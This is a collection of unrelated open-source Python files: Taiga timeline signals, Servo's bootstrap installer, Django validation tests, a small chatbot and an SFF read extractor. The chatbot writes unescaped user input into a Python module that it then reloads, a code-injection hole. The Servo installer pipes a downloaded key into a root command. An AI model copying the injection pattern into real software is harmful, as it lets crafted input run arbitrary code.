_push_to_timelines(project, user, obj, event_type, created_datetime, extra_data=extra_data)
def create_membership_push_to_timeline(sender, instance, **kwargs):
"""
    Creating a new membership with an associated user. If the user is the project owner we
    don't do anything, because that info is already shown in the created-project timeline entry.
@param sender: Membership model
@param instance: Membership object
"""
    # A brand-new membership with an associated user (the owner case is already covered above)
if not instance.pk and instance.user and instance.user != instance.project.owner:
created_datetime = instance.created_at
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# Updating existing membership
elif instance.pk:
try:
            prev_instance = sender.objects.get(pk=instance.pk)
if instance.user != prev_instance.user:
created_datetime = timezone.now()
# The new member
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# If we are updating the old user is removed from project
if prev_instance.user:
_push_to_timelines(instance.project,
prev_instance.user,
prev_instance,
"delete",
created_datetime)
except sender.DoesNotExist:
# This happens with some tests, when a membership is created with a concrete id
pass
def delete_membership_push_to_timeline(sender, instance, **kwargs):
if instance.user:
created_datetime = timezone.now()
_push_to_timelines(instance.project, instance.user, instance, "delete", created_datetime)
def create_user_push_to_timeline(sender, instance, created, **kwargs):
if created:
project = None
user = instance
_push_to_timelines(project, user, user, "create", created_datetime=user.date_joined)
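# Hedged wiring sketch (assumption -- the real signal registration lives in the
# app config elsewhere in taiga, and the sender model names are illustrative):
#     from django.db.models.signals import post_save, pre_save, post_delete
#     post_save.connect(on_new_history_entry, sender=HistoryEntry)
#     pre_save.connect(create_membership_push_to_timeline, sender=Membership)
#     post_delete.connect(delete_membership_push_to_timeline, sender=Membership)
#     post_save.connect(create_user_push_to_timeline, sender=User)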
|
sadmansk/servo
|
python/servo/bootstrap.py
|
Python
|
mpl-2.0
| 13,376
| 0.00157
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function
from distutils.spawn import find_executable
from distutils.version import LooseVersion
import json
import os
import platform
import shutil
import subprocess
from subprocess import PIPE
import servo.packages as packages
from servo.util import extract, download_file, host_triple
def install_trusty_deps(force):
version = str(subprocess.check_output(['gcc', '-dumpversion'])).split('.')
gcc = True
if int(version[0]) > 4:
gcc = False
elif int(version[0]) == 4 and int(version[1]) >= 9:
gcc = False
version = str(subprocess.check_output(['clang', '-dumpversion'])).split('.')
clang = int(version[0]) < 4
if gcc:
run_as_root(["add-apt-repository", "ppa:ubuntu-toolchain-r/test"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "gcc-4.9", "g++-4.9"], force)
run_as_root(['update-alternatives', '--install', '/usr/bin/gcc', 'gcc',
'/usr/bin/gcc-4.9', '60', '--slave', '/usr/bin/g++', 'g++',
'/usr/bin/g++-4.9'])
if clang:
run_as_root(["bash", "-c", 'wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | sudo apt-key add -'])
run_as_root(["apt-add-repository", "deb http://apt.llvm.org/trusty/ llvm-toolchain-xenial-4.0 main"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "clang-4.0"], force)
return gcc or clang
def check_gstreamer_lib():
return subprocess.call(["pkg-config", "gstreamer-1.0 >= 1.12"],
stdout=PIPE, stderr=PIPE) == 0
def run_as_root(command, force=False):
if os.geteuid() != 0:
command.insert(0, 'sudo')
if force:
        command.append("-y")
return subprocess.call(command)
def install_linux_deps(context, pkgs_ubuntu, pkgs_fedora, force):
install = False
pkgs = []
if context.distro == 'Ubuntu':
command = ['apt-get', 'install']
pkgs = pkgs_ubuntu
if subprocess.call(['dpkg', '-s'] + pkgs, stdout=PIPE, stderr=PIPE) != 0:
install = True
elif context.distro in ['CentOS', 'CentOS Linux', 'Fedora']:
installed_pkgs = str(subprocess.check_output(['rpm', '-qa'])).replace('\n', '|')
pkgs = pkgs_fedora
for p in pkgs:
command = ['dnf', 'install']
if "|{}".format(p) not in installed_pkgs:
install = True
break
if install:
if force:
command.append('-y')
print("Installing missing dependencies...")
run_as_root(command + pkgs)
return True
return False
def install_salt_dependencies(context, force):
pkgs_apt = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']
pkgs_dnf = ['gcc', 'libffi-devel', 'python-devel', 'openssl-devel']
if not install_linux_deps(context, pkgs_apt, pkgs_dnf, force):
print("Dependencies are already installed")
def gstreamer(context, force=False):
cur = os.curdir
gstdir = os.path.join(cur, "support", "linux", "gstreamer")
if not os.path.isdir(os.path.join(gstdir, "gstreamer", "lib")):
subprocess.check_call(["bash", "gstreamer.sh"], cwd=gstdir)
return True
return False
def bootstrap_gstreamer(context, force=False):
if not gstreamer(context, force):
print("gstreamer is already set up")
return 0
def linux(context, force=False):
# Please keep these in sync with the packages in README.md
pkgs_apt = ['git', 'curl', 'autoconf', 'libx11-dev', 'libfreetype6-dev',
'libgl1-mesa-dri', 'libglib2.0-dev', 'xorg-dev', 'gperf', 'g++',
'build-essential', 'cmake', 'python-pip',
'libbz2-dev', 'libosmesa6-dev', 'libxmu6', 'libxmu-dev', 'libglu1-mesa-dev',
'libgles2-mesa-dev', 'libegl1-mesa-dev', 'libdbus-1-dev', 'libharfbuzz-dev',
'ccache', 'clang', 'autoconf2.13']
pkgs_dnf = ['libtool', 'gcc-c++', 'libXi-devel', 'freetype-devel',
'mesa-libGL-devel', 'mesa-libEGL-devel', 'glib2-devel', 'libX11-devel',
'libXrandr-devel', 'gperf', 'fontconfig-devel', 'cabextract', 'ttmkfdir',
'python2', 'python2-virtualenv', 'python2-pip', 'expat-devel', 'rpm-build',
'openssl-devel', 'cmake', 'bzip2-devel', 'libXcursor-devel', 'libXmu-devel',
'mesa-libOSMesa-devel', 'dbus-devel', 'ncurses-devel', 'harfbuzz-devel',
'ccache', 'mesa-libGLU-devel', 'clang', 'clang-libs', 'gstreamer1-devel',
'gstreamer1-plugins-base-devel', 'gstreamer1-plugins-bad-free-devel', 'autoconf213']
if context.distro == "Ubuntu":
if context.distro_version == "17.04":
pkgs_apt += ["libssl-dev"]
elif int(context.distro_version.split(".")[0]) < 17:
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
if context.distro_version == "14.04":
pkgs_apt += ["python-virtualenv"]
else:
pkgs_apt += ["virtualenv"]
pkgs_apt += ['libgstreamer1.0-dev', 'libgstreamer-plugins-base1.0-dev',
'libgstreamer-plugins-bad1.0-dev']
elif context.distro == "Debian" and context.distro_version == "Sid":
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
installed_something = install_linux_deps(context, pkgs_apt, pkgs_dnf, force)
if not check_gstreamer_lib():
installed_something |= gstreamer(context, force)
if context.distro == "Ubuntu" and context.distro_version == "14.04":
installed_something |= install_trusty_deps(force)
if not installed_something:
print("Dependencies were already installed!")
return 0
def salt(context, force=False):
# Ensure Salt dependencies are installed
install_salt_dependencies(context, force)
# Ensure Salt is installed in the virtualenv
    # It's not installed globally because it's a large, non-required dependency,
# and the installation fails on Windows
print("Checking Salt installation...", end='')
reqs_path = os.path.join(context.topdir, 'python', 'requirements-salt.txt')
process = subprocess.Popen(
["pip", "install", "-q", "-I", "-r", reqs_path],
stdout=PIPE,
stderr=PIPE
)
process.wait()
if process.returncode:
out, err = process.communicate()
print('failed to install Salt via pip:')
print('Output: {}\nError: {}'.format(out, err))
return 1
print("done")
salt_root = os.path.join(context.sharedir, 'salt')
config_dir = os.path.join(salt_root, 'etc', 'salt')
pillar_dir = os.path.join(config_dir, 'pillars')
# In order to allow `mach bootstrap` to work from any CWD,
# the `root_dir` must be an absolute path.
# We place it under `context.sharedir` because
# Salt caches data (e.g. gitfs files) in its `var` subdirectory.
# Hence, dynamically generate the config with an appropriate `root_dir`
# and serialize it as JSON (which is valid YAML).
config = {
'hash_type': 'sha384',
'master': 'localhost',
'root_dir': salt_root,
'state_output': 'changes',
'state_tabular': True,
}
if 'SERVO_SALTFS_ROOT' in os.environ:
config.update({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [os.path.abspath(os.environ['SERVO_SALTFS_ROOT'])],
},
})
else:
config.update({
'fileserver_backend': ['git'],
'gitfs_env_whitelist': 'base',
'gitfs_provider': 'gitpython',
'gitfs_remotes': [
'https://github.com/servo/saltfs.git',
],
})
if not os.path.exists(config_dir):
os.makedirs(config_dir, mode=0o700)
with open(os.path.join(config_dir, 'minion'),
|
bufferapp/buffer-django-nonrel
|
tests/modeltests/validation/tests.py
|
Python
|
bsd-3-clause
| 5,944
| 0.003197
|
from django import forms
from django.test import TestCase
from django.core.exceptions import NON_FIELD_ERRORS
from modeltests.validation import ValidationTestCase
from modeltests.validation.models import Author, Article, ModelToValidate
# Import other tests for this package.
from modeltests.validation.validators import TestModelsWithValidators
from modeltests.validation.test_unique import (GetUniqueCheckTests,
PerformUniqueChecksTest)
from modeltests.validation.test_custom_messages import CustomMessagesTest
class BaseModelValidationTests(ValidationTestCase):
def test_missing_required_field_raises_error(self):
mtv = ModelToValidate(f_with_custom_validator=42)
self.assertFailsValidation(mtv.full_clean, ['name', 'number'])
def test_with_correct_value_model_validates(self):
mtv = ModelToValidate(number=10, name='Some Name')
self.assertEqual(None, mtv.full_clean())
def test_custom_validate_method(self):
mtv = ModelToValidate(number=11)
self.assertFailsValidation(mtv.full_clean, [NON_FIELD_ERRORS, 'name'])
def test_wrong_FK_value_raises_error(self):
mtv=ModelToValidate(number=10, name='Some Name', parent_id=3)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_correct_FK_value_validates(self):
parent = ModelToValidate.objects.create(number=10, name='Some Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertEqual(None, mtv.full_clean())
def test_limited_FK_raises_error(self):
# The limit_choices_to on the parent field says that a parent object's
# number attribute must be 10, so this should fail validation.
parent = ModelToValidate.objects.create(number=11, name='Other Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_wrong_email_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', email='not-an-email')
self.assertFailsValidation(mtv.full_clean, ['email'])
def test_correct_email_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', email='valid@email.com')
self.assertEqual(None, mtv.full_clean())
def test_wrong_url_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', url='not a url')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'Enter a valid value.'])
def test_correct_url_but_nonexisting_gives_404(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_url_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://www.djangoproject.com/')
self.assertEqual(None, mtv.full_clean()) # This will fail if there's no Internet connection
def test_correct_https_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='https://www.djangoproject.com/')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftp_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftp://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftps_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftps://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_text_greater_that_charfields_max_length_raises_erros(self):
mtv = ModelToValidate(number=10, name='Some Name'*100)
self.assertFailsValidation(mtv.full_clean, ['name',])
class ArticleForm(forms.ModelForm):
class Meta:
model = Article
exclude = ['author']
class ModelFormsTests(TestCase):
def setUp(self):
self.author = Author.objects.create(name='Joseph Kocherhans')
def test_partial_validation(self):
# Make sure the "commit=False and set field values later" idiom still
# works with model validation.
data = {
'title': 'The state of model validation',
'pub_date': '2010-1-10 14:49:00'
}
form = ArticleForm(data)
self.assertEqual(form.errors.keys(), [])
article = form.save(commit=False)
article.author = self.author
article.save()
def test_validation_with_empty_blank_field(self):
        # Since a value for pub_date wasn't provided and the field is
        # blank=True, model-validation should pass.
        # Also, Article.clean() should be run, so pub_date will be filled after
# validation, so the form should save cleanly even though pub_date is
# not allowed to be null.
data = {
'title': 'The state of model validation',
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), [])
self.assertNotEqual(form.instance.pub_date, None)
article = form.save()
def test_validation_with_invalid_blank_field(self):
# Even though pub_date is set to blank=True, an invalid value was
# provided, so it should fail validation.
data = {
'title': 'The state of model validation',
'pub_date': 'never'
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), ['pub_date'])
|
indie-dev/Clarissa
|
bot.py
|
Python
|
apache-2.0
| 2,985
| 0.022446
|
import os
import sys as sys
os.system("python bot/bot.py engage")
import bot_response as bot
import bot_learn as learner
def hasUserSwore(message):
if "fuck" in message:
return True
elif "bitch" in message:
return True
elif "Fuck" in message:
return True
elif "Bitch" in message:
return True
else:
return False
#Allow the user to communicate with the bot
#Also allow the bot to learn about the person
def toBot():
if(os.path.isfile(".bot_engage")):
print "You can only run one instance of Clarissa."
else:
swearNum = 1
messageToBot = raw_input("Message: ")
if(messageToBot == "--add-command"):
writeCommand(command=raw_input("Command: "), response=raw_input("Responses: "))
reload(bot)
elif(messageToBot == "kill-bot"):
exit()
elif(messageToBot == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif(messageToBot == "learn"):
learner.learn(db_support=False)
elif(messageToBot == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
bot.getResponse(messageToBot)
toBot()
def writeCommand(command, response):
file = open("bot_response.py", "a")
file.write("\n\telif(messageToBot == \""+command+"\"):")
file.write("\n\t\tprint \"Clarissa: "+response+"\"")
file.flush()
file.close()
commandList = open("commands.list", "w")
commandList.write(command)
commandList.flush()
commandList.close()
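# Illustrative note (assumption, not part of the original file): a call like
# writeCommand("Hi", "Hello there") appends roughly the following to
# bot_response.py:
#     elif(messageToBot == "Hi"):
#         print "Clarissa: Hello there"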
def getIf(message, command, response):
    if(message == command):
print "Clarissa: "+response
else:
print "I do not understand "+message
def getCommands():
return open("commands.bot", "r").read()
def getResponses():
return open("respo
|
nses.bot", "r").read()
swearNum = 0
try:
if(sys.argv[1] == "--add-command"):
writeCommand(command=sys.argv[2], response=sys.argv[3])
reload(bot)
elif (sys.argv[1] == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif (sys.argv[1] == "learn"):
learner.learn(db_support=False)
elif (sys.argv[1] == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
else:
toBot()
except IndexError:
toBot()
|
cfe-lab/Umberjack
|
test/simulations/indelible/__init__.py
|
Python
|
bsd-2-clause
| 20
| 0
|
__author__ = 'thuy'
|
JoseBlanca/ngs_crumbs
|
crumbs/seq/sff_extract.py
|
Python
|
gpl-3.0
| 7,004
| 0.000571
|
# Copyright 2012 Jose Blanca, Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of ngs_crumbs.
# ngs_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# ngs_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with ngs_crumbs. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
from array import array
from crumbs.utils.optional_modules import SffIterator
# pylint: disable=R0913
def _min_left_clipped_seqs(sff_fhand, trim, min_left_clip):
'It generates sequences (as tuples) given a path to a SFF file.'
for record in SffIterator(sff_fhand, trim=False):
annots = record.annotations
clip_qual = annots['clip_qual_left']
clip_adapt = annots['clip_adapter_left']
clip = max(min_left_clip, clip_qual, clip_adapt)
seq = record.seq
if trim:
record.annotations = {}
record = record[clip:]
else:
annots['clip_qual_left'] = clip
annots['clip_adapter_left'] = clip
seq = seq[:clip].lower() + seq[clip:].upper()
quals = record.letter_annotations['phred_quality']
record.letter_annotations = {}
record.seq = seq
dict.__setitem__(record._per_letter_annotations,
"phred_quality", quals)
yield record
class SffExtractor(object):
'This class extracts the reads from an SFF file'
def __init__(self, sff_fhands, trim=False, min_left_clip=0,
nucls_to_check=50, max_nucl_freq_threshold=0.5):
'It inits the class'
self.fhands = sff_fhands
self.trim = trim
self.min_left_clip = min_left_clip
# checking
self.nucls_to_check = nucls_to_check
self.max_nucl_freq_threshold = max_nucl_freq_threshold
self.nucl_counts = {}
@property
def seqs(self):
        'It yields all sequences'
for fhand in self.fhands:
self._prepare_nucl_counts(fhand.name)
if not self.min_left_clip:
seqs = SffIterator(fhand, trim=self.trim)
else:
                seqs = _min_left_clipped_seqs(fhand, self.trim,
self.min_left_clip)
for record in seqs:
self._update_nucl_counts(str(record.seq), fhand.name)
yield record
def _prepare_nucl_counts(self, fpath):
'It prepares the structure to store the nucleotide counts'
counts = {'A': array('L', [0] * self.nucls_to_check),
'T': array('L', [0] * self.nucls_to_check),
'C': array('L', [0] * self.nucls_to_check),
'G': array('L', [0] * self.nucls_to_check)}
self.nucl_counts[fpath] = counts
def _update_nucl_counts(self, seq, fpath):
'Given a seq (as a string) it updates the nucleotide counts'
seq = seq[:self.nucls_to_check]
counts = self.nucl_counts
for index, nucl in enumerate(seq):
try:
counts[fpath][nucl][index] += 1
except KeyError:
pass # we do not count the lowercase letters
@property
def clip_advice(self):
'It checks how many positions have a high max nucl freq.'
advices = {}
for fhand in self.fhands:
fpath = fhand.name
counts = self.nucl_counts[fpath]
            threshold = self.max_nucl_freq_threshold
pos_above_threshold = 0
seq_above_threshold = ''
index = 0
for index in range(self.nucls_to_check):
num_nucls = [counts['A'][index], counts['T'][index],
counts['C'][index], counts['G'][index]]
tot_nucls = sum(num_nucls)
if not tot_nucls:
continue
freq_nucls = [i / tot_nucls for i in num_nucls]
                above_threshold = [i >= threshold for i in freq_nucls]
if any(above_threshold):
pos_above_threshold += 1
seq_above_threshold += _get_nucl_with_max_freq('ATCG',
freq_nucls)
else:
break
if pos_above_threshold:
if self.trim:
# number of nucleotides to remove next time, the ones
# that we have detected plus the ones already removed
advice = index + self.min_left_clip, seq_above_threshold
else:
advice = index, seq_above_threshold
else:
advice = None
advices[fpath] = advice
return advices
def _do_seq_xml(seq):
seq = seq.object
annots = seq.annotations
read_len = len(seq)
read_name = seq.id
if 'E3MFGYR02FTGED' == read_name:
print annots, read_len
qual_left = annots.get('clip_qual_left', 0)
qual_right = annots.get('clip_qual_right', 0)
vector_left = annots.get('clip_adapter_left', 0)
vector_right = annots.get('clip_adapter_right', 0)
if vector_right >= read_len:
vector_right = 0
if qual_right >= read_len:
qual_right = 0
qual_left = 0 if qual_left < 0 else qual_left
qual_right = 0 if qual_right < 0 else qual_right
vector_left = 0 if vector_left < 0 else vector_left
vector_right = 0 if vector_right < 0 else vector_right
xml = '\t<trace>\n'
xml += '\t\t<trace_name>{}</trace_name>\n'.format(read_name)
if qual_left:
xml += '\t\t<clip_quality_left>{}</clip_quality_left>\n'.format(int(qual_left) + 1)
if qual_right:
xml += '\t\t<clip_quality_rigth>{}</clip_quality_rigth>\n'.format(qual_right)
if vector_left:
xml += '\t\t<clip_vector_left>{}</clip_vector_left>\n'.format(int(vector_left) + 1)
if vector_right:
xml += '\t\t<clip_vector_rigth>{}</clip_vector_rigth>\n'.format(vector_right)
xml += '\t</trace>\n'
return xml
def write_xml_traceinfo(seqs, fhand):
fhand.write('<?xml version="1.0"?>\n<trace_volume>\n')
for seq in seqs:
fhand.write(_do_seq_xml(seq))
yield seq
fhand.write('</trace_volume>\n')
fhand.flush()
def _get_nucl_with_max_freq(nucls, freq_nucls):
'It returns the nucleotide with the maximum frequency'
max_ = None
for index, freq in enumerate(freq_nucls):
if max_ is None or max_ < freq:
max_ = freq
nucl = nucls[index]
return nucl
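# Minimal usage sketch (illustrative assumption; the file name is hypothetical
# and any wrapping expected by write_xml_traceinfo is elided):
#     with open('reads.sff', 'rb') as sff_fhand:
#         extractor = SffExtractor([sff_fhand], trim=True)
#         for record in extractor.seqs:
#             pass  # e.g. hand each SeqRecord to a FASTQ writer here
#         print(extractor.clip_advice)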
|
CarlGraff/fundraisermemorial
|
fundraiser_app/urls.py
|
Python
|
mit
| 663
| 0.006033
|
from django.conf.urls import url
from fundraiser_app import views
urlpatterns = [
url(r'^$', views.FMItemListView.as_view(), name='fmitem_list'),
    url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^fmitem/(?P<pk>\d+)$', views.FMItemDetailView.as_view(), name='fmitem_detail'),
url(r'^fmitem/new$', views.FMItemCreateView.as_view(), name='fmitem_new'),
url(r'^fmitem/(?P<pk>\d+)/edit$', views.FMItemUpdateView.as_view(), name='fmitem_edit'),
    url(r'^fmitem/(?P<pk>\d+)/remove$', views.FMItemDeleteView.as_view(), name='fmitem_remove'),
url(r'^fmitem/(?P<pk>\d+)/publish/$', views.fmitem_publish, name='fmitem_publish'),
]
|